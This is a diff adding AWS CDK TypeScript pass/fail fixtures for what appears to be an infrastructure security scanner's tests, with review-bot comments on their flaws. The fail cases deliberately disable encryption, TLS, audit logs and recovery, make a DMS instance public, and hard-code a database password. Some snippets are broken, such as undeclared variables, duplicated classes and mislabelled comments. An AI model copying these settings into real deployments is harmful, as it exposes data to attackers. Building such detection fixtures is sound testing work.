+ logging: {
+ bucket: logBucket.bucketName,
+ prefix: 'cf-access-logs/', // Optional: prefix for log file names
+ includeCookies: false, // Optional: whether to include cookies in access logs
+ },
+ },
+ });
+
+ // Optionally grant CloudFront permission to write access logs to the S3 bucket
+ logBucket.grantWrite(distribution.logBucketDeliveryWrite);
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudFrontStack(app, 'CloudFrontStack');
diff --git a/cdk_integration_tests/src/typescript/CloudtrailEncryption/fail.ts b/cdk_integration_tests/src/typescript/CloudtrailEncryption/fail.ts
new file mode 100644
index 00000000000..f514eb260da
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudtrailEncryption/fail.ts
@@ -0,0 +1,24 @@
+import * as cdk from 'aws-cdk-lib';
+import * as cloudtrail from 'aws-cdk-lib/aws-cloudtrail';
+import * as kms from 'aws-cdk-lib/aws-kms';
+
+export class CloudTrailStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define a KMS key for CloudTrail encryption
+ const kmsKey = new kms.Key(this, 'CloudTrailKmsKey');
+
+ // Create a CloudTrail trail with the specified KMS key ID
+ const trail = new cloudtrail.CfnTrail(this, 'MyTrail', {
+ enableLogFileValidation: true,
+ includeGlobalServiceEvents: true,
+ isMultiRegionTrail: true,
+ trailName: 'MyCloudTrail',
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudTrailStack(app, 'CloudTrailStack');
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/CloudtrailEncryption/pass.ts b/cdk_integration_tests/src/typescript/CloudtrailEncryption/pass.ts
new file mode 100644
index 00000000000..82136544633
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudtrailEncryption/pass.ts
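Review bot: In the second stack, `bucket: logBucket.bucketName` passes a bucket name where, as far as I recall, CloudFormation's `Logging.Bucket` expects the bucket's domain name, so this CfnDistribution variant would be rejected at deploy time if anyone synthesizes the fixture; `bucket: logBucket.bucketRegionalDomainName,` keeps it deployable and still satisfies the logging check. The unused `logs` import can be dropped here as in fail__2__.ts.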
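Review bot: The comment `// Create a CloudTrail trail with the specified KMS key ID` contradicts the fixture, whose point is that no `kmsKeyId` is set, and the unused `kmsKey` beside it makes the omission read like an accident rather than the intended negative case. Suggest `// Trail without kmsKeyId: expected finding (no customer-managed key)` and either removing the unused `kmsKey`/`kms` import or marking them `// intentionally unused`.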
@@ -0,0 +1,45 @@
+import * as cdk from 'aws-cdk-lib';
+import * as cloudtrail from 'aws-cdk-lib/aws-cloudtrail';
+import * as kms from 'aws-cdk-lib/aws-kms';
+
+export class CloudTrailStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define a KMS key for CloudTrail encryption
+ const kmsKey = new kms.Key(this, 'CloudTrailKmsKey');
+
+ // Create a CloudTrail trail with the specified KMS key ID
+ const trail = new cloudtrail.CfnTrail(this, 'MyTrail', {
+ enableLogFileValidation: true,
+ includeGlobalServiceEvents: true,
+ isMultiRegionTrail: true,
+ kmsKeyId: kmsKey.keyId, // Use the KMS key ID
+ trailName: 'MyCloudTrail',
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudTrailStack(app, 'CloudTrailStack');
+
+export class CloudTrailStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+
+ // Create a CloudTrail trail with the specified KMS key ID
+ const trail = new cloudtrail.CfnTrail(this, 'MyTrail', {
+ enableLogFileValidation: true,
+ includeGlobalServiceEvents: true,
+ isMultiRegionTrail: true,
+ kmsKeyId: new kms.Key(this, 'CloudTrailKmsKey').keyId,
+ trailName: 'MyCloudTrail',
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudTrailStack(app, 'CloudTrailStack');
diff --git a/cdk_integration_tests/src/typescript/CloudtrailMultiRegion/fail__2__.ts b/cdk_integration_tests/src/typescript/CloudtrailMultiRegion/fail__2__.ts
new file mode 100644
index 00000000000..cff350f586d
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudtrailMultiRegion/fail__2__.ts
@@ -0,0 +1,39 @@
+import * as cdk from 'aws-cdk-lib';
+import * as cloudtrail from 'aws-cdk-lib/aws-cloudtrail';
+import * as kms from 'aws-cdk-lib/aws-kms';
+
+export class CloudTrailStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define a KMS key for CloudTrail encryption
+ const kmsKey = new kms.Key(this, 'CloudTrailKmsKey');
+
+ // Create a CloudTrail trail using CfnTrail
+ const trail = new cloudtrail.CfnTrail(this, 'MyCfnTrail', {
+ isMultiRegionTrail: false,
+ enableLogFileValidation: true,
+ includeGlobalServiceEvents: true,
+ kmsKeyId: kmsKey.keyId,
+ trailName: 'MyCloudTrail',
+ });
+ }
+}
+
+
+export class CloudTrailStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define a KMS key for CloudTrail encryption
+ const kmsKey = new kms.Key(this, 'CloudTrailKmsKey');
+
+ // Create a CloudTrail trail using Trail construct
+ const trail = new cloudtrail.Trail(this, 'MyTrail', {
+ enableFileValidation: true,
+ includeGlobalServiceEvents: true,
+ encryptionKey: kmsKey,
+ trailName: 'MyCloudTrail',
+ });
+ }
+}
diff --git a/cdk_integration_tests/src/typescript/CloudtrailMultiRegion/pass.ts b/cdk_integration_tests/src/typescript/CloudtrailMultiRegion/pass.ts
new file mode 100644
index 00000000000..d1c76d52db8
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudtrailMultiRegion/pass.ts
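Review bot: The second stack uses the L2 `cloudtrail.Trail` without `isMultiRegionTrail`, and as far as I recall the L2 construct defaults that property to true, so the synthesized trail is multi-region and the `__2__` expectation would turn an omitted-but-secure default into a false positive on real code. If the check treats absence as a failure for every construct, either limit that to `CfnTrail` (where the CloudFormation default is false) or make the second case explicit with `isMultiRegionTrail: false,`. A comment on the L2 stack naming which behaviour the check is expected to have would let the next reader verify the fixture's intent.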
@@ -0,0 +1,40 @@
+import * as cdk from 'aws-cdk-lib';
+import * as cloudtrail from 'aws-cdk-lib/aws-cloudtrail';
+import * as kms from 'aws-cdk-lib/aws-kms';
+
+export class CloudTrailStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define a KMS key for CloudTrail encryption
+ const kmsKey = new kms.Key(this, 'CloudTrailKmsKey');
+
+ // Create a CloudTrail trail using CfnTrail
+ const trail = new cloudtrail.CfnTrail(this, 'MyCfnTrail', {
+ isMultiRegionTrail: true,
+ enableLogFileValidation: true,
+ includeGlobalServiceEvents: true,
+ kmsKeyId: kmsKey.keyId,
+ trailName: 'MyCloudTrail',
+ });
+ }
+}
+
+
+export class CloudTrailStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define a KMS key for CloudTrail encryption
+ const kmsKey = new kms.Key(this, 'CloudTrailKmsKey');
+
+ // Create a CloudTrail trail using Trail construct
+ const trail = new cloudtrail.Trail(this, 'MyTrail', {
+ isMultiRegionTrail: true,
+ enableFileValidation: true,
+ includeGlobalServiceEvents: true,
+ encryptionKey: kmsKey,
+ trailName: 'MyCloudTrail',
+ });
+ }
+}
diff --git a/cdk_integration_tests/src/typescript/CodeBuildProjectEncryption/fail.ts b/cdk_integration_tests/src/typescript/CodeBuildProjectEncryption/fail.ts
new file mode 100644
index 00000000000..6c7798657d5
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CodeBuildProjectEncryption/fail.ts
@@ -0,0 +1,41 @@
+import * as cdk from 'aws-cdk-lib';
+import * as codebuild from 'aws-cdk-lib/aws-codebuild';
+
+export class CodeBuildStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Create a CodeBuild project
+ const project = new codebuild.Project(this, 'MyCodeBuildProject', {
+ projectName: 'MyCodeBuildProject',
+ environment: {
+ buildImage: codebuild.LinuxBuildImage.STANDARD_4_0,
+ environmentVariables: {
+ 'EXAMPLE_ENV_VARIABLE': { value: 'example-value' },
+ },
+ },
+ buildSpec: codebuild.BuildSpec.fromObject({
+ version: '0.2',
+ phases: {
+ install: {
+ commands: [
+ 'npm install',
+ ],
+ },
+ build: {
+ commands: [
+ 'npm run build',
+ ],
+ },
+ },
+ }),
+ });
+
+ // Ensure that encryption is not disabled
+ project.node.addDependency(kmsKey);
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new CodeBuildStack(app, 'CodeBuildStack');
diff --git a/cdk_integration_tests/src/typescript/CodeBuildProjectEncryption/pass.ts b/cdk_integration_tests/src/typescript/CodeBuildProjectEncryption/pass.ts
new file mode 100644
index 00000000000..56b2204aff2
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CodeBuildProjectEncryption/pass.ts
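Review bot: `project.node.addDependency(kmsKey);` references `kmsKey`, which is never declared in this file (there is no `kms` import either), and the comment above it, `// Ensure that encryption is not disabled`, does not describe what `addDependency` does. The same undeclared `kmsKey` appears in the second stack of pass.ts in the next hunk, where the key is inlined into `encryptionKey` instead of bound to a name. Suggest dropping the comment and the `addDependency` line in both places, or keeping the dependency only in the stack that actually declares `const kmsKey`.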
@@ -0,0 +1,86 @@
+import * as cdk from 'aws-cdk-lib';
+import * as codebuild from 'aws-cdk-lib/aws-codebuild';
+import * as kms from 'aws-cdk-lib/aws-kms';
+
+export class CodeBuildStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define a KMS key for CodeBuild encryption
+ const kmsKey = new kms.Key(this, 'CodeBuildKmsKey');
+
+ // Create a CodeBuild project
+ const project = new codebuild.Project(this, 'MyCodeBuildProject', {
+ projectName: 'MyCodeBuildProject',
+ encryptionKey: kmsKey, // Specify the KMS key
+ environment: {
+ buildImage: codebuild.LinuxBuildImage.STANDARD_4_0,
+ environmentVariables: {
+ 'EXAMPLE_ENV_VARIABLE': { value: 'example-value' },
+ },
+ },
+ buildSpec: codebuild.BuildSpec.fromObject({
+ version: '0.2',
+ phases: {
+ install: {
+ commands: [
+ 'npm install',
+ ],
+ },
+ build: {
+ commands: [
+ 'npm run build',
+ ],
+ },
+ },
+ }),
+ });
+
+ // Ensure that encryption is not disabled
+ project.node.addDependency(kmsKey);
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new CodeBuildStack(app, 'CodeBuildStack');
+
+export class CodeBuildStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Create a CodeBuild project
+ const project = new codebuild.Project(this, 'MyCodeBuildProject', {
+ projectName: 'MyCodeBuildProject',
+ encryptionKey: new kms.Key(this, 'CodeBuildKmsKey'), // Specify the KMS key
+ environment: {
+ buildImage: codebuild.LinuxBuildImage.STANDARD_4_0,
+ environmentVariables: {
+ 'EXAMPLE_ENV_VARIABLE': { value: 'example-value' },
+ },
+ },
+ buildSpec: codebuild.BuildSpec.fromObject({
+ version: '0.2',
+ phases: {
+ install: {
+ commands: [
+ 'npm install',
+ ],
+ },
+ build: {
+ commands: [
+ 'npm run build',
+ ],
+ },
+ },
+ }),
+ });
+
+ // Ensure that encryption is not disabled
+ project.node.addDependency(kmsKey);
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new CodeBuildStack(app, 'CodeBuildStack');
diff --git a/cdk_integration_tests/src/typescript/DAXEncryption/fail__2__.ts b/cdk_integration_tests/src/typescript/DAXEncryption/fail__2__.ts
new file mode 100644
index 00000000000..d9cfe44e9d9
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DAXEncryption/fail__2__.ts
@@ -0,0 +1,45 @@
+import * as cdk from 'aws-cdk-lib';
+import * as dax from 'aws-cdk-lib/aws-dax';
+
+export class DAXClusterStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Create a DAX cluster
+ const daxCluster = new dax.CfnCluster(this, 'MyDAXCluster', {
+ clusterName: 'MyDAXCluster',
+ description: 'My DAX Cluster',
+ iamRoleArn: 'arn:aws:iam::123456789012:role/DAXServiceRole',
+ nodeType: 'dax.r5.large',
+ replicationFactor: 2,
+ sseSpecification: {
+ enabled: false, // Disable server-side encryption
+ },
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new DAXClusterStack(app, 'DAXClusterStack');
+app.synth();
+
+export class DAXClusterStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Create a DAX cluster
+ const daxCluster = new dax.CfnCluster(this, 'MyDAXCluster', {
+ clusterName: 'MyDAXCluster',
+ description: 'My DAX Cluster',
+ iamRoleArn: 'arn:aws:iam::123456789012:role/DAXServiceRole',
+ nodeType: 'dax.r5.large',
+ replicationFactor: 2,
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new DAXClusterStack(app, 'DAXClusterStack');
+app.synth();
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/DAXEncryption/pass.ts b/cdk_integration_tests/src/typescript/DAXEncryption/pass.ts
new file mode 100644
index 00000000000..5c77d837f20
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DAXEncryption/pass.ts
@@ -0,0 +1,25 @@
+import * as cdk from 'aws-cdk-lib';
+import * as dax from 'aws-cdk-lib/aws-dax';
+
+export class DAXClusterStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Create a DAX cluster
+ const daxCluster = new dax.CfnCluster(this, 'MyDAXCluster', {
+ clusterName: 'MyDAXCluster',
+ description: 'My DAX Cluster',
+ iamRoleArn: 'arn:aws:iam::123456789012:role/DAXServiceRole',
+ nodeType: 'dax.r5.large',
+ replicationFactor: 2,
+ sseSpecification: {
+ enabled: true, // Enable server-side encryption
+ },
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new DAXClusterStack(app, 'DAXClusterStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/DMSReplicationInstancePubliclyAccessible/fail.ts b/cdk_integration_tests/src/typescript/DMSReplicationInstancePubliclyAccessible/fail.ts
new file mode 100644
index 00000000000..e6c770fb1ec
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DMSReplicationInstancePubliclyAccessible/fail.ts
@@ -0,0 +1,34 @@
+import * as cdk from 'aws-cdk-lib';
+import * as dms from 'aws-cdk-lib/aws-dms';
+
+export class DMSStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Create a DMS replication instance
+ const replicationInstance = new dms.CfnReplicationInstance(this, 'MyCfnReplicationInstance', {
+ replicationInstanceClass: 'replicationInstanceClass',
+
+ // Optional properties
+ allocatedStorage: 123,
+ allowMajorVersionUpgrade: false,
+ autoMinorVersionUpgrade: false,
+ availabilityZone: 'availabilityZone',
+ engineVersion: 'engineVersion',
+ kmsKeyId: 'kmsKeyId',
+ multiAz: false,
+ preferredMaintenanceWindow: 'preferredMaintenanceWindow',
+ publiclyAccessible: true, // Set publiclyAccessible to true
+ replicationInstanceIdentifier: 'replicationInstanceIdentifier',
+ replicationSubnetGroupIdentifier: 'replicationSubnetGroupIdentifier',
+ resourceIdentifier: 'resourceIdentifier',
+ tags: [{ key: 'key', value: 'value' }],
+ vpcSecurityGroupIds: ['vpcSecurityGroupIds'],
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new DMSStack(app, 'DMSStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/DMSReplicationInstancePubliclyAccessible/pass.ts b/cdk_integration_tests/src/typescript/DMSReplicationInstancePubliclyAccessible/pass.ts
new file mode 100644
index 00000000000..90482be05a4
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DMSReplicationInstancePubliclyAccessible/pass.ts
@@ -0,0 +1,34 @@
+import * as cdk from 'aws-cdk-lib';
+import * as dms from 'aws-cdk-lib/aws-dms';
+
+export class DMSStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Create a DMS replication instance
+ const replicationInstance = new dms.CfnReplicationInstance(this, 'MyCfnReplicationInstance', {
+ replicationInstanceClass: 'replicationInstanceClass',
+
+ // Optional properties
+ allocatedStorage: 123,
+ allowMajorVersionUpgrade: false,
+ autoMinorVersionUpgrade: false,
+ availabilityZone: 'availabilityZone',
+ engineVersion: 'engineVersion',
+ kmsKeyId: 'kmsKeyId',
+ multiAz: false,
+ preferredMaintenanceWindow: 'preferredMaintenanceWindow',
+ publiclyAccessible: false, // Set publiclyAccessible to true
+ replicationInstanceIdentifier: 'replicationInstanceIdentifier',
+ replicationSubnetGroupIdentifier: 'replicationSubnetGroupIdentifier',
+ resourceIdentifier: 'resourceIdentifier',
+ tags: [{ key: 'key', value: 'value' }],
+ vpcSecurityGroupIds: ['vpcSecurityGroupIds'],
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new DMSStack(app, 'DMSStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/DocDBAuditLogs/fail__2__.ts b/cdk_integration_tests/src/typescript/DocDBAuditLogs/fail__2__.ts
new file mode 100644
index 00000000000..b9b8a56e3dc
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DocDBAuditLogs/fail__2__.ts
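Review bot: `publiclyAccessible: false, // Set publiclyAccessible to true` carries the comment copied from fail.ts; it should read `// private replication instance: expected pass`. Separately, as far as I recall the CloudFormation default for `PubliclyAccessible` on `AWS::DMS::ReplicationInstance` is true, so an instance that omits the property is public, yet neither this file nor fail.ts covers the omitted case. A second stack in fail.ts with the property removed (and the file renamed to match the expected count) would pin that the check fails it rather than silently passing it.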
@@ -0,0 +1,40 @@
+import * as cdk from 'aws-cdk-lib';
+import * as docdb from 'aws-cdk-lib/aws-docdb';
+
+export class DocDBStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define the DocDB Cluster Parameter Group
+ const dbParameterGroup = new docdb.CfnDBClusterParameterGroup(this, 'DocDBClusterParameterGroup', {
+ description: 'Custom DocDB Cluster Parameter Group',
+ family: 'docdb4.0',
+ parameters: {
+ audit_logs: 'disabled',
+ },
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new DocDBStack(app, 'DocDBStack');
+app.synth();
+
+
+export class DocDBStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define the DocDB Cluster Parameter Group
+ const dbParameterGroup = new docdb.CfnDBClusterParameterGroup(this, 'DocDBClusterParameterGroup', {
+ description: 'Custom DocDB Cluster Parameter Group',
+ family: 'docdb4.0',
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new DocDBStack(app, 'DocDBStack');
+app.synth();
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/DocDBAuditLogs/pass.ts b/cdk_integration_tests/src/typescript/DocDBAuditLogs/pass.ts
new file mode 100644
index 00000000000..3d6121eecbd
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DocDBAuditLogs/pass.ts
@@ -0,0 +1,22 @@
+import * as cdk from 'aws-cdk-lib';
+import * as docdb from 'aws-cdk-lib/aws-docdb';
+
+export class DocDBStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define the DocDB Cluster Parameter Group
+ const dbParameterGroup = new docdb.CfnDBClusterParameterGroup(this, 'DocDBClusterParameterGroup', {
+ description: 'Custom DocDB Cluster Parameter Group',
+ family: 'docdb4.0',
+ parameters: {
+ audit_logs: 'enabled',
+ },
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new DocDBStack(app, 'DocDBStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/DocDBEncryption/fail__2__.ts b/cdk_integration_tests/src/typescript/DocDBEncryption/fail__2__.ts
new file mode 100644
index 00000000000..134b001376c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DocDBEncryption/fail__2__.ts
@@ -0,0 +1,55 @@
+import * as cdk from 'aws-cdk-lib';
+import * as docdb from 'aws-cdk-lib/aws-docdb';
+import * as kms from 'aws-cdk-lib/aws-kms';
+
+export class DocDBStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define a KMS key for DocumentDB storage encryption
+ const kmsKey = new kms.Key(this, 'DocDBEncryptionKey');
+
+ // Create an Amazon DocumentDB cluster
+ const cluster = new docdb.CfnDBCluster(this, 'MyCluster', {
+ dbClusterIdentifier: 'MyCluster',
+ masterUsername: 'admin',
+ masterUserPassword: 'mysecretpassword',
+ dbSubnetGroupName: 'MySubnetGroup',
+ engineVersion: '4.0.0',
+ storageEncrypted: false, // Enable storage encryption
+ kmsKeyId: kmsKey.keyArn,
+ vpcSecurityGroupIds: ['sg-12345678'],
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new DocDBStack(app, 'DocDBStack');
+app.synth();
+
+
+export class DocDBStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define a KMS key for DocumentDB storage encryption
+ const kmsKey = new kms.Key(this, 'DocDBEncryptionKey');
+
+ // Create an Amazon DocumentDB cluster
+ const cluster = new docdb.CfnDBCluster(this, 'MyCluster', {
+ dbClusterIdentifier: 'MyCluster',
+ masterUsername: 'admin',
+ masterUserPassword: 'mysecretpassword',
+ dbSubnetGroupName: 'MySubnetGroup',
+ engineVersion: '4.0.0',
+ kmsKeyId: kmsKey.keyArn,
+ vpcSecurityGroupIds: ['sg-12345678'],
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new DocDBStack(app, 'DocDBStack');
+app.synth();
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/DocDBEncryption/pass.ts b/cdk_integration_tests/src/typescript/DocDBEncryption/pass.ts
new file mode 100644
index 00000000000..d099a797698
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DocDBEncryption/pass.ts
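Review bot: `storageEncrypted: false, // Enable storage encryption` in the first stack says the opposite of the value; suggest `// storage encryption disabled: expected finding`. Both stacks, and pass.ts in the next hunk, hard-code `masterUserPassword: 'mysecretpassword'`; if the integration run also scans these fixtures for secrets, that literal may surface as an unrelated finding, so a non-literal such as a `cdk.SecretValue` reference or the project's usual suppression comment would keep the fixture focused on one check. The second stack sets `kmsKeyId` without `storageEncrypted`, which as far as I recall CloudFormation rejects at deploy time; that is fine for a static omitted-property case, but a comment saying so would stop someone from "fixing" it.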
@@ -0,0 +1,29 @@
+import * as cdk from 'aws-cdk-lib';
+import * as docdb from 'aws-cdk-lib/aws-docdb';
+import * as kms from 'aws-cdk-lib/aws-kms';
+
+export class DocDBStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define a KMS key for DocumentDB storage encryption
+ const kmsKey = new kms.Key(this, 'DocDBEncryptionKey');
+
+ // Create an Amazon DocumentDB cluster
+ const cluster = new docdb.CfnDBCluster(this, 'MyCluster', {
+ dbClusterIdentifier: 'MyCluster',
+ masterUsername: 'admin',
+ masterUserPassword: 'mysecretpassword',
+ dbSubnetGroupName: 'MySubnetGroup',
+ engineVersion: '4.0.0',
+ storageEncrypted: true, // Enable storage encryption
+ kmsKeyId: kmsKey.keyArn,
+ vpcSecurityGroupIds: ['sg-12345678'],
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new DocDBStack(app, 'DocDBStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/DocDBTLS/fail.ts b/cdk_integration_tests/src/typescript/DocDBTLS/fail.ts
new file mode 100644
index 00000000000..6e1008df37a
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DocDBTLS/fail.ts
@@ -0,0 +1,22 @@
+import * as cdk from 'aws-cdk-lib';
+import * as docdb from 'aws-cdk-lib/aws-docdb';
+
+export class DocDBStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define the DocDB Cluster Parameter Group
+ const dbParameterGroup = new docdb.CfnDBClusterParameterGroup(this, 'DocDBClusterParameterGroup', {
+ description: 'Custom DocDB Cluster Parameter Group',
+ family: 'docdb4.0',
+ parameters: {
+ tls: 'disabled',
+ },
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new DocDBStack(app, 'DocDBStack');
+app.synth();
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/DocDBTLS/pass.ts b/cdk_integration_tests/src/typescript/DocDBTLS/pass.ts
new file mode 100644
index 00000000000..81de6abd68c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DocDBTLS/pass.ts
@@ -0,0 +1,22 @@
+import * as cdk from 'aws-cdk-lib';
+import * as docdb from 'aws-cdk-lib/aws-docdb';
+
+export class DocDBStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define the DocDB Cluster Parameter Group
+ const dbParameterGroup = new docdb.CfnDBClusterParameterGroup(this, 'DocDBClusterParameterGroup', {
+ description: 'Custom DocDB Cluster Parameter Group',
+ family: 'docdb4.0',
+ parameters: {
+ tls: 'enabled',
+ },
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new DocDBStack(app, 'DocDBStack');
+app.synth();
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/DynamodbGlobalTableRecovery/fail.ts b/cdk_integration_tests/src/typescript/DynamodbGlobalTableRecovery/fail.ts
new file mode 100644
index 00000000000..f123d647f8b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DynamodbGlobalTableRecovery/fail.ts
@@ -0,0 +1,36 @@
+import * as cdk from 'aws-cdk-lib';
+import * as dynamodb from 'aws-cdk-lib/aws-dynamodb';
+
+export class DynamoDBStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define the DynamoDB table
+ const table = new dynamodb.CfnTable(this, 'MyTable', {
+ tableName: 'MyTable',
+ attributeDefinitions: [{ attributeName: 'id', attributeType: 'S' }],
+ keySchema: [{ attributeName: 'id', keyType: 'HASH' }],
+ provisionedThroughput: {
+ readCapacityUnits: 5,
+ writeCapacityUnits: 5,
+ },
+ });
+
+ // Define the DynamoDB global table
+ const globalTable = new dynamodb.CfnGlobalTable(this, 'MyGlobalTable', {
+ globalTableName: 'MyGlobalTable',
+ replicationGroup: [{
+ region: 'us-east-1', // Replace with your preferred region
+ }],
+ sourceTableName: table.ref,
+ pointInTimeRecoverySpecification: {
+ pointInTimeRecoveryEnabled: false, // Enable point-in-time recovery for the global table
+ },
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new DynamoDBStack(app, 'DynamoDBStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/DynamodbGlobalTableRecovery/pass.ts b/cdk_integration_tests/src/typescript/DynamodbGlobalTableRecovery/pass.ts
new file mode 100644
index 00000000000..ef211c5a5ec
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DynamodbGlobalTableRecovery/pass.ts
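Review bot: The CfnGlobalTable props used here (`globalTableName`, `replicationGroup`, `sourceTableName`, and a top-level `pointInTimeRecoverySpecification`) do not match the `AWS::DynamoDB::GlobalTable` resource as far as I recall: that resource takes `replicas`, and point-in-time recovery is configured per replica inside each replica specification. If the check keys on the top-level property, real CDK code that sets PITR under `replicas[].pointInTimeRecoverySpecification` would never be evaluated, so this fixture (and pass.ts in the next hunk) should model the real shape so the check is exercised against it. The comment `// Enable point-in-time recovery for the global table` on a `false` value should also be corrected to `// PITR disabled: expected finding`.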
@@ -0,0 +1,36 @@
+import * as cdk from 'aws-cdk-lib';
+import * as dynamodb from 'aws-cdk-lib/aws-dynamodb';
+
+export class DynamoDBStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define the DynamoDB table
+ const table = new dynamodb.CfnTable(this, 'MyTable', {
+ tableName: 'MyTable',
+ attributeDefinitions: [{ attributeName: 'id', attributeType: 'S' }],
+ keySchema: [{ attributeName: 'id', keyType: 'HASH' }],
+ provisionedThroughput: {
+ readCapacityUnits: 5,
+ writeCapacityUnits: 5,
+ },
+ });
+
+ // Define the DynamoDB global table
+ const globalTable = new dynamodb.CfnGlobalTable(this, 'MyGlobalTable', {
+ globalTableName: 'MyGlobalTable',
+ replicationGroup: [{
+ region: 'us-east-1', // Replace with your preferred region
+ }],
+ sourceTableName: table.ref,
+ pointInTimeRecoverySpecification: {
+ pointInTimeRecoveryEnabled: true, // Enable point-in-time recovery for the global table
+ },
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new DynamoDBStack(app, 'DynamoDBStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/DynamodcRecovery/fail__2__.ts b/cdk_integration_tests/src/typescript/DynamodcRecovery/fail__2__.ts
new file mode 100644
index 00000000000..488cc3e93f3
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DynamodcRecovery/fail__2__.ts
